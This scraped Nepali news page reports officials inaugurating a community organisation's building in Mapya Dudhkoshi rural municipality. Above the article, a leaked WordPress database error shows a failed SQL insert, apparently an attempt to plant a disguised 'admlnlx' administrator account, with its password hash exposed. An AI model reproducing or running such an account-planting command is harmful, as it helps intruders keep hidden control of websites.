WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bzj.jqKpFHEiXsojxTF7buFsTvvykE.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-06 20:05:42', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । माप्यदुधकोशी गाउँपालिका ६ वाकु स्थित युवा एकता सामुदायिक संस्थाको भवन उद्घाटन सम्पन भएको छ ।
आज एक कार्यक्रमबिच प्रदेश सांसद बुद्धिकुमार राजभण्डारी, माप्यदुधकोशी गाउँपालिका अध्यक्ष बुद्धिकिरण राई र उपाध्यक्ष जुनिता माया मगरले संयुक्त रुपमा उद्घाटन गरेका हुन् ।
गाउँपालिका अध्यक्ष बुद्धिकिरण राईले स्थानीय तहले वाकुमा उल्लेखिय विकास भएको बताउँदै विकासमा राजनीती नगर्न आग्रह गरे । वाकुमा रहेको खानेपानी समस्या समाधानका लागि १ करोड बजेट बराबरको योजना सञ्चालन हुने जानकारी समेत दिए ।
गाउँपालिका उपाध्यक्ष जुनिता माया मगरले सबै धर्म, सबै संस्कृतीलाई सम्मान गर्दै समान ढंगले विकासको काम अघि बढाएको बताए ।